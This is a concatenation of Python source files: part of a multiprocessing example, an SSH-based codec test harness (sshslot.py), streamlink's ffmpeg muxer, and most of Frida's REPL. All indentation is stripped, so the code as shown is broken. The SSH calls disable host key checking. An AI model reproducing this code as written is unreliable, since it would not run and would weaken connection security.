list(map(task_queue.put, TASKS1))
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print('Unordered results:')
for i in range(len(TASKS1)):
print('\t', done_queue.get())
# Add more tasks using `put()` instead of `putMany()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
print('\t', done_queue.get())
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freezeSupport()
test()
|
sshslot.py
|
from utility import *
import subprocess
import sys
import os
import threading
import time
ssh_privkey_file = os.getenv("SSH_PRIVKEY_FILE", "daala.pem")
binaries = {
'daala':['examples/encoder_example','examples/dump_video'],
'x264': ['x264'],
'x264-rt': ['x264'],
'x265': ['build/linux/x265'],
'x265-rt': ['build/linux/x265'],
'xvc': ['build/app/xvcenc', 'build/app/xvcdec'],
'vp8': ['vpxenc','vpxdec'],
'vp9': ['vpxenc','vpxdec'],
'vp9-rt': ['vpxenc','vpxdec'],
'vp10': ['vpxenc','vpxdec'],
'vp10-rt': ['vpxenc','vpxdec'],
'av1': ['aomenc','aomdec'],
'av1-rt': ['aomenc','aomdec'],
'av2-ai': ['aomenc','aomdec'],
'av2-ra': ['aomenc','aomdec'],
'av2-ra-st': ['aomenc','aomdec'],
'av2-ld': ['aomenc','aomdec'],
'av2-as': ['aomenc','aomdec'],
'thor': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'thor-rt': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'rav1e': ['target/release/rav1e'],
'svt-av1': ['Bin/Release/SvtAv1EncApp', 'Bin/Release/libSvtAv1Enc.so.0']
}
# Finding files such as `this_(that)` requires `'` be placed on both
# sides of the quote so the `()` are both captured. Files such as
# `du_Parterre_d'Eau` must be converted into
#`'du_Parterre_d'"'"'Eau'
# ^^^ Required to make sure the `'` is captured.
def shellquote(s):
return "'" + s.replace("'", "'\"'\"'") + "'"
class Machine:
def __init__(self,host,user='ec2-user',cores=18,work_root='/home/ec2-user',port=22,media_path='/mnt/media'):
self.host = host
self.user = user
self.cores = cores
self.work_root = work_root
self.port = str(port)
self.media_path = media_path
self.log = None
self.slots = []
def rsync(self, local, remote):
return subprocess.call(['rsync', '-r', '-e', "ssh -i "+ssh_privkey_file+" -o StrictHostKeyChecking=no -p "+str(self.port), local, self.user + '@' + self.host + ':' + remote])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.port,'-o',' StrictHostKeyChecking=no',
self.user+'@'+self.host,
command.encode("utf-8")])
def get_slots(self):
slots = []
#by doing the machines in the inner loop,
#we end up with heavy jobs split across machines better
for i in range(0,self.cores):
slots.append(Slot(self, i, self.log))
self.slots = slots
return slots
def get_name(self):
return self.host
class SlotProcess:
def __init__(self, log):
self.p = None
self.can_kill = threading.Event()
self.log = log
def kill(self):
# wait until there is actually a process to kill
success = self.can_kill.wait(20)
if not success:
rd_print(self.log,"Waited too long for process to kill.")
if self.p:
rd_print(self.log,"Will try to kill anyway.")
else:
rd_print(self.log,"Aborting kill.")
return
try:
self.p.kill()
except Exception as e:
rd_print(self.log,"Couldn't cancel work item",e)
def communicate(self):
return self.p.communicate()
def shell(self, args):
self.p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.can_kill.set()
#the job slots we can fill
class Slot:
def __init__(self, machine, num, log):
self.machine = machine
self.work_root = machine.work_root + '/slot' + str(num)
self.p = None
self.busy = False
self.work = None
self.log = log
self.can_kill = None
def gather(self):
return self.p.communicate()
def start_work(self, work):
self.work = work
work.slot = self
self.p = SlotProcess(self.log)
work_thread = threading.Thread(target=self.execute)
work_thread.daemon = True
self.busy = True
work_thread.start()
def clear_work(self):
if self.work:
self.work.slot = None
self.work = None
def execute(self):
try:
self.work.execute()
except Exception as e:
rd_print(self.log, e)
self.work.failed = True
self.busy = False
def setup(self,codec,bindir):
time.sleep(1)
try:
self.check_shell('mkdir -p '+shellquote(self.work_root))
time.sleep(1)
self.check_shell('rm -f '+shellquote(self.work_root)+'/*.y4m '+shellquote(self.work_root)+'/*.ivf')
time.sleep(1)
except subprocess.CalledProcessError as e:
rd_print(self.log,e.output)
rd_print(self.log,'Couldn\'t connect to machine '+self.machine.host)
raise RuntimeError('This is a bug with AWCY. Likely this machine has gone unreachable.')
if self.machine.rsync('./',self.work_root+'/rd_tool/') != 0:
rd_print(self.log,'Couldn\'t set up machine '+self.machine.host)
raise RuntimeError('Couldn\'t copy tools to machine (out of disk space?)')
time.sleep(1)
self.check_shell('rm -rf '+shellquote(self.work_root+'/'+codec))
for binary in binaries[codec]:
time.sleep(1)
self.check_shell('mkdir -p '+shellquote(self.work_root+'/'+codec+'/'+os.path.dirname(binary)))
time.sleep(1)
if self.machine.rsync(bindir+'/'+binary,self.work_root+'/'+codec+'/'+binary) != 0:
rd_print(self.log,'Couldn\'t upload codec binary '+binary+' to '+self.machine.host)
raise RuntimeError('Couldn\'t upload codec binary')
def start_shell(self, command):
self.p.shell(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no', self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
def kill(self):
kill_thread = threading.Thread(target=self.p.kill)
kill_thread.daemon = True
kill_thread.start()
def get_file(self, remote, local):
return subprocess.call(['scp','-T','-i',ssh_privkey_file,'-P',self.machine.port,self.machine.user+'@'+self.machine.host+':'+shellquote(remote),local])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no',
self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
|
ffmpegmux.py
|
import os
import random
import threading
import subprocess
import sys
from streamlink import StreamError
from streamlink.stream import Stream
from streamlink.stream.stream import StreamIO
from streamlink.utils import NamedPipe
from streamlink.compat import devnull, which
import logging
log = logging.getLogger(__name__)
class MuxedStream(Stream):
__shortname__ = "muxed-stream"
def __init__(self, session, *substreams, **options):
super(MuxedStream, self).__init__(session)
self.substreams = substreams
self.subtitles = options.pop("subtitles", {})
self.options = options
def open(self):
fds = []
metadata = self.options.get("metadata", {})
maps = self.options.get("maps", [])
# only update the maps values if they haven't been set
update_maps = not maps
for i, substream in enumerate(self.substreams):
log.debug("Opening {0} substream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
for i, subtitle in enumerate(self.subtitles.items()):
language, substream = subtitle
log.debug("Opening {0} subtitle stream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
metadata["s:s:{0}".format(i)] = ["language={0}".format(language)]
self.options["metadata"] = metadata
self.options["maps"] = maps
return FFMPEGMuxer(self.session, *fds, **self.options).open()
@classmethod
def is_usable(cls, session):
return FFMPEGMuxer.is_usable(session)
class FFMPEGMuxer(StreamIO):
__commands__ = ['ffmpeg', 'ffmpeg.exe', 'avconv', 'avconv.exe']
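# The muxer feeds each substream into ffmpeg through its own named pipe:
# one copy_to_pipe thread per input stream writes raw data into its pipe,
# ffmpeg reads the pipes as inputs (-i), applies the codec/map/metadata
# options built in __init__, and writes the muxed container to outpath
# (by default "pipe:1", i.e. stdout), which read() below exposes to the
# caller.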
@staticmethod
def copy_to_pipe(self, stream, pipe):
log.debug("Starting copy to pipe: {0}".format(pipe.path))
pipe.open("wb")
while not stream.closed:
try:
data = stream.read(8192)
if len(data):
pipe.write(data)
else:
break
except IOError:
log.error("Pipe copy aborted: {0}".format(pipe.path))
return
try:
pipe.close()
except IOError: # might fail closing, but that should be ok for the pipe
pass
log.debug("Pipe copy complete: {0}".format(pipe.path))
def __init__(self, session, *streams, **options):
if not self.is_usable(session):
raise StreamError("cannot use FFMPEG")
self.session = session
self.process = None
log = logging.getLogger("streamlink.stream.mp4mux-ffmpeg")
self.streams = streams
self.pipes = [NamedPipe("ffmpeg-{0}-{1}".format(os.getpid(), random.randint(0, 1000))) for _ in self.streams]
self.pipe_threads = [threading.Thread(target=self.copy_to_pipe, args=(self, stream, np))
for stream, np in
zip(self.streams, self.pipes)]
ofmt = options.pop("format", "matroska")
outpath = options.pop("outpath", "pipe:1")
videocodec = session.options.get("ffmpeg-video-transcode") or options.pop("vcodec", "copy")
audiocodec = session.options.get("ffmpeg-audio-transcode") or options.pop("acodec", "copy")
metadata = options.pop("metadata", {})
maps = options.pop("maps", [])
copyts = options.pop("copyts", False)
self._cmd = [self.command(session), '-nostats', '-y']
for np in self.pipes:
self._cmd.extend(["-i", np.path])
self._cmd.extend(['-c:v', videocodec])
self._cmd.extend(['-c:a', audiocodec])
for m in maps:
self._cmd.extend(["-map", str(m)])
if copyts:
self._cmd.extend(["-copyts"])
for stream, data in metadata.items():
for datum in data:
self._cmd.extend(["-metadata:{0}".format(stream), datum])
self._cmd.extend(['-f', ofmt, outpath])
log.debug("ffmpeg command: {0}".format(' '.join(self._cmd)))
self.close_errorlog = False
if session.options.get("ffmpeg-verbose"):
self.errorlog = sys.stderr
elif session.options.get("ffmpeg-verbose-path"):
self.errorlog = open(session.options.get("ffmpeg-verbose-path"), "w")
self.close_errorlog = True
else:
self.errorlog = devnull()
def open(self):
for t in self.pipe_threads:
t.daemon = True
t.start()
self.process = subprocess.Popen(self._cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=self.errorlog)
return self
@classmethod
def is_usable(cls, session):
return cls.command(session) is not None
@classmethod
def command(cls, session):
command = []
if session.options.get("ffmpeg-ffmpeg"):
command.append(session.options.get("ffmpeg-ffmpeg"))
for cmd in command or cls.__commands__:
if which(cmd):
return cmd
def read(self, size=-1):
data = self.process.stdout.read(size)
return data
def close(self):
log.debug("Closing ffmpeg thread")
if self.process:
# kill ffmpeg
self.process.kill()
self.process.stdout.close()
# close the streams
for stream in self.streams:
if hasattr(stream, "close"):
stream.close()
log.debug("Closed all the substreams")
if self.close_errorlog:
self.errorlog.close()
self.errorlog = None
|
repl.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import os
import signal
import string
import threading
def main():
import codecs
import hashlib
import json
import os
import platform
import re
import sys
try:
from urllib.request import build_opener
except:
from urllib2 import build_opener
from colorama import Fore, Style
import frida
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.completion import Completion, Completer
from prompt_toolkit.lexers import PygmentsLexer
from prompt_toolkit.styles import Style as PromptToolkitStyle
from pygments.lexers.javascript import JavascriptLexer
from pygments.token import Token
from frida_tools.application import ConsoleApplication
class REPLApplication(ConsoleApplication):
def __init__(self):
self._script = None
self._ready = threading.Event()
self._stopping = threading.Event()
self._errors = 0
config_dir = self._get_or_create_config_dir()
self._completer = FridaCompleter(self)
self._cli = None
self._last_change_id = 0
self._monitored_files = {}
super(REPLApplication, self).__init__(self._process_input, self._on_stop)
if self._have_terminal and not self._plain_terminal:
style = PromptToolkitStyle([
("completion-menu", "bg:#3d3d3d #ef6456"),
("completion-menu.completion.current", "bg:#ef6456 #3d3d3d"),
])
history = FileHistory(os.path.join(config_dir, 'history'))
self._cli = PromptSession(lexer=PygmentsLexer(JavascriptLexer),
style=style,
history=history,
completer=self._completer,
complete_in_thread=True)
self._dumb_stdin_reader = None
else:
self._cli = None
self._dumb_stdin_reader = DumbStdinReader(valid_until=self._stopping.is_set)
if not self._have_terminal:
self._rpc_complete_server = start_completion_thread(self)
def _add_options(self, parser):
parser.add_option("-l", "--load", help="load SCRIPT", metavar="SCRIPT",
type='string', action='store', dest="user_script", default=None)
parser.add_option("-P", "--parameters", help="parameters as JSON, same as Gadget", metavar="PARAMETERS_JSON",
type='string', action='store', dest="user_parameters", default=None)
parser.add_option("-C", "--cmodule", help="load CMODULE", metavar="CMODULE",
type='string', action='store', dest="user_cmodule", default=None)
parser.add_option("-c", "--codeshare", help="load CODESHARE_URI", metavar="CODESHARE_URI",
type='string', action='store', dest="codeshare_uri", default=None)
parser.add_option("-e", "--eval", help="evaluate CODE", metavar="CODE",
type='string', action='append', dest="eval_items", default=None)
parser.add_option("-q", help="quiet mode (no prompt) and quit after -l and -e",
action='store_true', dest="quiet", default=False)
parser.add_option("--no-pause", help="automatically start main thread after startup",
action='store_true', dest="no_pause", default=False)
parser.add_option("-o", "--output", help="output to log file", dest="logfile", default=None)
parser.add_option("--exit-on-error", help="exit with code 1 after encountering any exception in the SCRIPT",
action='store_true', dest="exit_on_error", default=False)
def _initialize(self, parser, options, args):
if options.user_script is not None:
self._user_script = os.path.abspath(options.user_script)
with codecs.open(self._user_script, 'rb', 'utf-8') as f:
pass
else:
self._user_script = None
if options.user_parameters is not None:
try:
params = json.loads(options.user_parameters)
except Exception as e:
raise ValueError("failed to parse parameters argument as JSON: {}".format(e))
if not isinstance(params, dict):
raise ValueError("failed to parse parameters argument as JSON: not an object")
self._user_parameters = params
else:
self._user_parameters = {}
if options.user_cmodule is not None:
self._user_cmodule = os.path.abspath(options.user_cmodule)
with codecs.open(self._user_cmodule, 'rb', 'utf-8') as f:
pass
else:
self._user_cmodule = None
self._codeshare_uri = options.codeshare_uri
self._codeshare_script = None
self._pending_eval = options.eval_items
self._quiet = options.quiet
self._no_pause = options.no_pause
self._exit_on_error = options.exit_on_error
if options.logfile is not None:
self._logfile = codecs.open(options.logfile, 'w', 'utf-8')
else:
self._logfile = None
def _log(self, level, text):
ConsoleApplication._log(self, level, text)
if self._logfile is not None:
self._logfile.write(text + "\n")
def _usage(self):
return "usage: %prog [options] target"
def _needs_target(self):
return True
def _start(self):
self._prompt_string = self._create_prompt()
if self._codeshare_uri is not None:
self._codeshare_script = self._load_codeshare_script(self._codeshare_uri)
if self._codeshare_script is None:
self._print("Exiting!")
self._exit(1)
return
try:
self._load_script()
except Exception as e:
self._update_status("Failed to load script: {error}".format(error=e))
self._exit(1)
return
if self._spawned_argv is not None:
if self._no_pause:
self._update_status(
"Spawned `{command}`. Resuming main thread!".format(command=" ".join(self._spawned_argv)))
self._do_magic("resume")
else:
self._update_status(
"Spawned `{command}`. Use %resume to let the main thread start executing!".format(
command=" ".join(self._spawned_argv)))
else:
self._clear_status()
self._ready.set()
def _on_stop(self):
self._stopping.set()
if self._cli is not None:
try:
self._cli.app.exit()
except:
pass
def _stop(self):
self._unload_script()
with frida.Cancellable() as c:
self._demonitor_all()
if self._logfile is not None:
self._logfile.close()
if not self._quiet:
self._print("\nThank you for using Frida!")
def _load_script(self):
self._monitor_all()
if self._user_script is not None:
name, ext = os.path.splitext(os.path.basename(self._user_script))
else:
name = "repl"
is_first_load = self._script is None
script = self._session.create_script(name=name,
source=self._create_repl_script(),
runtime=self._runtime)
script.set_log_handler(self._log)
self._unload_script()
self._script = script
def on_message(message, data):
self._reactor.schedule(lambda: self._process_message(message, data))
script.on('message', on_message)
script.load()
cmodule_source = self._create_cmodule_source()
if cmodule_source is not None:
script.exports.frida_repl_load_cmodule(cmodule_source)
stage = 'early' if self._target[0] == 'file' and is_first_load else 'late'
try:
script.exports.init(stage, self._user_parameters)
except:
pass
def _unload_script(self):
if self._script is None:
return
try:
self._script.unload()
except:
pass
self._script = None
def _monitor_all(self):
for path in [self._user_script, self._user_cmodule]:
self._monitor(path)
def _demonitor_all(self):
for monitor in self._monitored_files.values():
monitor.disable()
self._monitored_files = {}
def _monitor(self, path):
if path is None or path in self._monitored_files:
return
monitor = frida.FileMonitor(path)
monitor.on('change', self._on_change)
monitor.enable()
self._monitored_files[path] = monitor
def _process_input(self, reactor):
if not self._quiet:
self._print_startup_message()
try:
while self._ready.wait(0.5) != True:
if not reactor.is_running():
return
except KeyboardInterrupt:
self._reactor.cancel_io()
return
while True:
expression = ""
line = ""
while len(expression) == 0 or line.endswith("\\"):
if not reactor.is_running():
return
prompt = "[%s]" % self._prompt_string + "-> " if len(expression) == 0 else "... "
pending_eval = self._pending_eval
if pending_eval is not None:
if len(pending_eval) > 0:
expression = pending_eval.pop(0)
if not self._quiet:
self._print(prompt + expression)
else:
self._pending_eval = None
else:
if self._quiet:
self._exit_status = 0 if self._errors == 0 else 1
return
try:
if self._cli is not None:
line = self._cli.prompt(prompt)
if line is None:
return
else:
line = self._dumb_stdin_reader.read_line(prompt)
self._print(line)
except EOFError:
if not self._have_terminal and os.environ.get("TERM", '') != "dumb":
while not self._stopping.wait(1):
pass
return
except KeyboardInterrupt:
line = ""
if not self._have_terminal:
sys.stdout.write("\n" + prompt)
continue
if len(line.strip()) > 0:
if len(expression) > 0:
expression += "\n"
expression += line.rstrip("\\")
if expression.endswith("?"):
try:
self._print_help(expression)
except JavaScriptError as e:
error = e.error
self._print(Style.BRIGHT + error['name'] + Style.RESET_ALL + ": " + error['message'])
except frida.InvalidOperationError:
return
elif expression == "help":
self._print("Help: #TODO :)")
elif expression in ("exit", "quit", "q"):
return
else:
try:
if expression.startswith("%"):
self._do_magic(expression[1:].rstrip())
else:
if not self._eval_and_print(expression):
self._errors += 1
except frida.OperationCancelledError:
return
def _eval_and_print(self, expression):
success = False
try:
(t, value) = self._perform_on_reactor_thread(lambda: self._evaluate(expression))
if t in ('function', 'undefined', 'null'):
output = t
elif t == 'binary':
output = hexdump(value).rstrip("\n")
else:
output = json.dumps(value, sort_keys=True, indent=4, separators=(",", ": "))
success = True
except JavaScriptError as e:
error = e.error
output = Fore.RED + Style.BRIGHT + error['name'] + Style.RESET_ALL + ": " + error['message']
stack = error.get('stack', None)
if stack is not None:
trimmed_stack = stack.split("\n")[1:-5]
if len(trimmed_stack) > 0:
first = trimmed_stack[0]
if first.rfind("duktape.c:") == len(first) - 16:
trimmed_stack = trimmed_stack[1:]
if len(trimmed_stack) > 0:
output += "\n" + "\n".join(trimmed_stack)
except frida.InvalidOperationError:
return success
if output != "undefined":
self._print(output)
return success
def _print_startup_message(self):
self._print("""\
____
/ _ | Frida {version} - A world-class dynamic instrumentation toolkit
| (_| |
> _ | Commands:
/_/ |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://www.frida.re/docs/home/""".format(version=frida.__version__))
def _print_help(self, expression):
# TODO: Figure out docstrings and implement here. This is real jankaty right now.
help_text = ""
if expression.endswith(".?"):
expression = expression[:-2] + "?"
obj_to_identify = [x for x in expression.split(' ') if x.endswith("?")][0][:-1]
(obj_type, obj_value) = self._evaluate(obj_to_identify)
if obj_type == "function":
signature = self._evaluate("%s.toString()" % obj_to_identify)[1]
clean_signature = signature.split("{")[0][:-1].split('function ')[-1]
if "[native code]" in signature:
help_text += "Type: Function (native)\n"
else:
help_text += "Type: Function\n"
help_text += "Signature: %s\n" % clean_signature
help_text += "Docstring: #TODO :)"
elif obj_type == "object":
help_text += "Type: Object\n"
help_text += "Docstring: #TODO :)"
elif obj_type == "boolean":
help_text += "Type: Boolean\n"
help_text += "Docstring: #TODO :)"
elif obj_type == "string":
help_text += "Type: Boolean\n"
help_text += "Text: %s\n" % self._evaluate("%s.toString()" % obj_to_identify)[1]
help_text += "Docstring: #TODO :)"
self._print(help_text)
# Negative means at least abs(val) - 1
_magic_command_args = {
'resume': 0,
'load': 1,
'reload': 0,
'unload': 0,
'time': -2 # At least 1 arg
}
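# Example: 'time' is -2, so `%time <expression>` requires at least one
# argument, while 'resume', 'reload' and 'unload' take none.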
def _do_magic(self, statement):
tokens = statement.split(" ")
command = tokens[0]
args = tokens[1:]
required_args = self._magic_command_args.get(command)
if required_args == None:
self._print("Unknown command: {}".format(command))
self._print("Valid commands: {}".format(", ".join(self._magic_command_args.keys())))
return
atleast_args = False
if required_args < 0:
atleast_args = True
required_args = abs(required_args) - 1
if (not atleast_args and len(args) != required_args) or \
(atleast_args and len(args) < required_args):
self._print("{cmd} command expects {atleast}{n} argument{s}".format(
cmd=command, atleast='at least ' if atleast_args else '', n=required_args,
s='' if required_args == 1 else 's'))
return
if command == 'resume':
self._reactor.schedule(lambda: self._resume())
elif command == 'reload':
self._reload()
elif command == 'time':
self._eval_and_print('''
(function () {{
var _startTime = Date.now();
var _result = eval({expression});
var _endTime = Date.now();
console.log('Time: ' + (_endTime - _startTime) + ' ms.');
return _result;
}})();'''.format(expression=json.dumps(" ".join(args))))
def _reload(self):
try:
self._perform_on_reactor_thread(lambda: self._load_script())
return True
except Exception as e:
self._print("Failed to load script: {}".format(e))
return False
def _create_prompt(self):
device_type = self._device.type
type_name = self._target[0]
if type_name == 'pid':
if self._target[1] == 0:
target = 'SystemSession'
else:
target = 'PID::%u' % self._target[1]
elif type_name == 'file':
target = os.path.basename(self._target[1][0])
else:
target = self._target[1]
if device_type in ('local', 'remote'):
prompt_string = "%s::%s" % (device_type.title(), target)
else:
prompt_string = "%s::%s" % (self._device.name, target)
return prompt_string
def _evaluate(self, text):
result = self._script.exports.frida_repl_evaluate(text)
if is_byte_array(result):
return ('binary', result)
elif isinstance(result, dict):
return ('binary', bytes())
elif result[0] == 'error':
raise JavaScriptError(result[1])
else:
return result
def _process_message(self, message, data):
message_type = message['type']
if message_type == 'error':
text = message.get('stack', message['description'])
self._log('error', text)
self._errors += 1
if self._exit_on_error:
self._exit(1)
else:
self._print("message:", message, "data:", data)
def _on_change(self, changed_file, other_file, event_type):
if event_type == 'changes-done-hint':
return
self._last_change_id += 1
change_id = self._last_change_id
self._reactor.schedule(lambda: self._process_change(change_id), delay=0.05)
def _process_change(self, change_id):
if change_id != self._last_change_id:
return
try:
self._load_script()
except Exception as e:
self._print("Failed to load script: {error}".format(error=e))
def _create_repl_script(self):
user_script = ""
if self._codeshare_script is not None:
user_script = self._codeshare_script
if self._user_script is not None:
with codecs.open(self._user_script, 'rb', 'utf-8') as f:
user_script += f.read().rstrip("\r\n") + "\n\n// Frida REPL script:\n"
return "_init();" + user_script + """\
function _init() {
global.cm = null;
global.cs = {};
var rpcExports = {
fridaReplEvaluate: function (expression) {
try {
var result = (1, eval)(expression);
if (result instanceof ArrayBuffer) {
return result;
} else {
var type = (result === null) ? 'null' : typeof result;
return [type, result];
}
} catch (e) {
return ['error', {
name: e.name,
message: e.message,
stack: e.stack
}];
}
},
fridaReplLoadCmodule: function (source) {
var cs = global.cs;
if (cs._frida_log === undefined)
cs._frida_log = new NativeCallback(onLog, 'void', ['pointer']);
global.cm = new CModule(source, cs);
},
};
Object.defineProperty(rpc, 'exports', {
get: function () {
return rpcExports;
},
set: function (value) {
Object.keys(value).forEach(function (name) {
rpcExports[name] = value[name];
});
}
});
function onLog(messagePtr) {
var message = messagePtr.readUtf8String();
console.log(message);
}
}
"""
def _create_cmodule_source(self):
if self._user_cmodule is None:
return None
name = os.path.basename(self._user_cmodule)
with codecs.open(self._user_cmodule, 'rb', 'utf-8') as f:
source = f.read()
return """static void frida_log (const char * format, ...);\n#line 1 "{name}"\n""".format(name=name) + source + """\
#line 1 "frida-repl-builtins.c"
#include <glib.h>
extern void _frida_log (const gchar * message);
static void
frida_log (const char * format,
...)
{
gchar * message;
va_list args;
va_start (args, format);
message = g_strdup_vprintf (format, args);
va_end (args);
_frida_log (message);
g_free (message);
}
"""
def _load_codeshare_script(self, uri):
trust_store = self._get_or_create_truststore()
project_url = "https://codeshare.frida.re/api/project/{}/".format(uri)
response_json = None
try:
request = build_opener()
request.addheaders = [('User-Agent', 'Frida v{} | {}'.format(frida.__version__, platform.platform()))]
response = request.open(project_url)
response_content = response.read().decode('utf-8')
response_json = json.loads(response_content)
except Exception as e:
self._print("Got an unhandled exception while trying to retrieve {} - {}".format(uri, e))
return None
trusted_signature = trust_store.get(uri, "")
fingerprint = hashlib.sha256(response_json['source'].encode('utf-8')).hexdigest()
if fingerprint == trusted_signature:
return response_json['source']
self._print("""Hello! This is the first time you're running this particular snippet, or the snippet's source code has changed.
Project Name: {project_name}
Author: {author}
Slug: {slug}
Fingerprint: {fingerprint}
URL: {url}
""".format(
project_name=response_json['project_name'],
author="@" + uri.split('/')[0],
slug=uri,
fingerprint=fingerprint,
url="https://codeshare.frida.re/@{}".format(uri)
))
while True:
prompt_string = "Are you sure you'd like to trust this project? [y/N] "
response = get_input(prompt_string)
if response.lower() in ('n', 'no') or response == '':
return None
if response.lower() in ('y', 'yes'):
self._print(
"Adding fingerprint {} to the trust store! You won't be prompted again unless the code changes.".format(
fingerprint))
script = response_json['source']
self._update_truststore({
uri: fingerprint
})
return script
def _get_or_create_config_dir(self):
xdg_home = os.getenv("XDG_CONFIG_HOME")
if xdg_home is not None:
config_dir = os.path.join(xdg_home, "frida")
else:
config_dir = os.path.join(os.path.expanduser("~"), ".frida")
if not os.path.exists(config_dir):
os.makedirs(config_dir)
return config_dir
def _update_truststore(self, record):
trust_store = self._get_or_create_truststore()
trust_store.update(record)
config_dir = self._get_or_create_config_dir()
codeshare_trust_store = os.path.join(config_dir, "codeshare-truststore.json")
with open(codeshare_trust_store, 'w') as f:
f.write(json.dumps(trust_store))
def _get_or_create_truststore(self):
config_dir = self._get_or_create_config_dir()
codeshare_trust_store = os.path.join(config_dir, "codeshare-truststore.json")
if os.path.exists(codeshare_trust_store):
try:
with open(codeshare_trust_store) as f:
trust_store = json.load(f)
except Exception as e:
self._print(
"Unable to load the codeshare truststore ({}), defaulting to an empty truststore. You will be prompted every time you want to run a script!".format(
e))
trust_store = {}
else:
with open(codeshare_trust_store, 'w') as f:
f.write(json.dumps({}))
trust_store = {}
return trust_store
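# Illustrative sketch (not part of the REPL itself): the codeshare trust store is a JSON
# mapping from a project slug to the SHA-256 hex digest of that project's JavaScript
# source, so any change to the hosted script triggers a fresh trust prompt. The slug and
# source below are placeholders.
def _example_truststore_entry():
    source = "console.log('hello');"
    fingerprint = hashlib.sha256(source.encode('utf-8')).hexdigest()
    return {"example-author/example-project": fingerprint}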
class FridaCompleter(Completer):
def __init__(self, repl):
self._repl = repl
self._lexer = JavascriptLexer()
def get_completions(self, document, complete_event):
prefix = document.text_before_cursor
magic = len(prefix) > 0 and prefix[0] == '%' and not any(map(lambda c: c.isspace(), prefix))
tokens = list(self._lexer.get_tokens(prefix))[:-1]
# 0.toString() is invalid syntax,
# but pygments doesn't seem to know that
for i in range(len(tokens) - 1):
if tokens[i][0] == Token.Literal.Number.Integer \
and tokens[i + 1][0] == Token.Punctuation and tokens[i + 1][1] == '.':
tokens[i] = (Token.Literal.Number.Float, tokens[i][1] + tokens[i + 1][1])
del tokens[i + 1]
before_dot = ''
after_dot = ''
encountered_dot = False
for t in tokens[::-1]:
if t[0] in Token.Name.subtypes:
before_dot = t[1] + before_dot
elif t[0] == Token.Punctuation and t[1] == '.':
before_dot = '.' + before_dot
if not encountered_dot:
encountered_dot = True
after_dot = before_dot[1:]
before_dot = ''
else:
if encountered_dot:
# The value/contents of the string, number or array doesn't matter,
# so we just use the simplest value with that type
if t[0] in Token.Literal.String.subtypes:
before_dot = '""' + before_dot
elif t[0] in Token.Literal.Number.subtypes:
before_dot = '0.0' + before_dot
elif t[0] == Token.Punctuation and t[1] == ']':
before_dot = '[]' + before_dot
break
try:
if encountered_dot:
if before_dot == "" or before_dot.endswith("."):
return
for key in self._get_keys("""\
(function () {
var o;
try {
o = """ + before_dot + """;
} catch (e) {
return [];
}
if (o === undefined || o === null)
return [];
var k = Object.getOwnPropertyNames(o);
var p;
if (typeof o !== 'object')
p = o.__proto__;
else
p = Object.getPrototypeOf(o);
if (p !== null && p !== undefined)
k = k.concat(Object.getOwnPropertyNames(p));
return k;
})();"""):
if self._pattern_matches(after_dot, key):
yield Completion(key, -len(after_dot))
else:
if magic:
keys = self._repl._magic_command_args.keys()
else:
keys = self._get_keys("Object.getOwnPropertyNames(this)")
for key in keys:
if not self._pattern_matches(before_dot, key) or (key.startswith('_') and before_dot == ''):
continue
yield Completion(key, -len(before_dot))
except frida.InvalidOperationError:
pass
except frida.OperationCancelledError:
pass
except Exception as e:
self._repl._print(e)
def _get_keys(self, code):
repl = self._repl
with repl._reactor.io_cancellable:
(t, value) = repl._evaluate(code)
if t == 'error':
return []
return sorted(filter(self._is_valid_name, set(value)))
def _is_valid_name(self, name):
tokens = list(self._lexer.get_tokens(name))
return len(tokens) == 2 and tokens[0][0] in Token.Name.subtypes
def _pattern_matches(self, pattern, text):
        return re.search(re.escape(pattern), text, re.IGNORECASE) is not None
def hexdump(src, length=16):
try:
xrange
except NameError:
xrange = range
FILTER = "".join([(len(repr(chr(x))) == 3) and chr(x) or "." for x in range(256)])
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c + length]
hex = " ".join(["%02x" % x for x in iterbytes(chars)])
printable = ''.join(["%s" % ((x <= 127 and FILTER[x]) or ".") for x in iterbytes(chars)])
lines.append("%04x %-*s %s\n" % (c, length * 3, hex, printable))
return "".join(lines)
def is_byte_array(value):
if sys.version_info[0] >= 3:
return isinstance(value, bytes)
else:
return isinstance(value, str)
if sys.version_info[0] >= 3:
iterbytes = lambda x: iter(x)
else:
def iterbytes(data):
return (ord(char) for char in data)
app = REPLApplication()
app.run()
class JavaScriptError(Exception):
def __init__(self, error):
super(JavaScriptError, self).__init__(error['message'])
self.error = error
class DumbStdinReader(object):
def __init__(self, valid_until):
self._valid_until = valid_until
self._prompt = None
self._result = None
self._lock = threading.Lock()
self._cond = threading.Condition(self._lock)
worker = threading.Thread(target=self._process_requests, name="stdin-reader")
worker.daemon = True
worker.start()
signal.signal(signal.SIGINT, lambda n, f: self._cancel_line())
def read_line(self, prompt_string):
with self._lock:
self._prompt = prompt_string
self._cond.notify()
with self._lock:
while self._result is None:
if self._valid_until():
raise EOFError()
self._cond.wait(1)
line, error = self._result
self._result = None
if error is not None:
raise error
return line
def _process_requests(self):
error = None
while error is None:
with self._lock:
while self._prompt is None:
self._cond.wait()
prompt = self._prompt
try:
line = get_input(prompt)
except Exception as e:
